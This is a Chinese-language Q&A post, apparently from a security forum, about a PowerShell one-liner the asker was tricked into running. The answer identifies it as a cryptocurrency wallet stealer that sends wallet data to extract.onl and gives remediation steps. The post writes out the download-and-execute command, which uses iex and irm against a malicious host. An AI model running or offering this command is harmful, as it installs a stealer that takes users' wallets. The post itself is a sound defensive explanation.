我是个白痴,被吸引到运行 PowerShell 脚本。它的细节是什么?我有一种感觉,他们只从我的系统上传了一些文件。
但我担心我的系统上可能有一个后门正在运行。我可以忍受的上传,但不是后门。
警告!不要 运行 此脚本。
iex "& { $(irm
(我把它分成两行以防止无意运行它)
powershell.software/versioncheck) } RunJob"
警告!不要 运行 此脚本。
我是个白痴,被吸引到运行 PowerShell 脚本。它的细节是什么?我有一种感觉,他们只从我的系统上传了一些文件。
但我担心我的系统上可能有一个后门正在运行。我可以忍受的上传,但不是后门。
警告!不要 运行 此脚本。
iex "& { $(irm
(我把它分成两行以防止无意运行它)
powershell.software/versioncheck) } RunJob"
警告!不要 运行 此脚本。
警告:请勿执行此答案中的任何代码。它是恶意的,仅出于演示目的而包含在内。
powershell.software/versioncheck
是恶意链接它指向的页面如下所示:
当您尝试在浏览器中访问此链接时,它会迅速将您从该页面重定向到另一个页面,假装(很糟糕)该站点不存在:
但是,在您提供的完整命令中执行时,它将以下行识别为 PowerShell 命令:
它是一个原始的加密货币钱包窃取者。每一行都从
Invoke-RestMethod
尝试将数据从其他可能的加密货币钱包(如果您的计算机上安装了任何加密货币钱包)发送到端点上的页面开始http://extract.onl
。如果您的计算机上有任何加密货币钱包,它们现在很可能已被盗用。将其中的任何内容转移到另一个安全钱包。
总结您的担忧:
是的,如果您的计算机上存在这些文件,则它们已被上传。然而,这就是这个脚本所做的所有事情,因此您的系统上没有留下持久的后门。
2021 年 10 月 25 日编辑:自编写此答案以来,powershell.software/versioncheck
现在阻止了对恶意代码的访问(现在会产生 403 错误),但可能随时返回。这仍然是一个风险。2022 年 1 月 24 日编辑:
的所有者
powershell.software/versioncheck
已将恶意代码重新上线。这仍然是一个风险。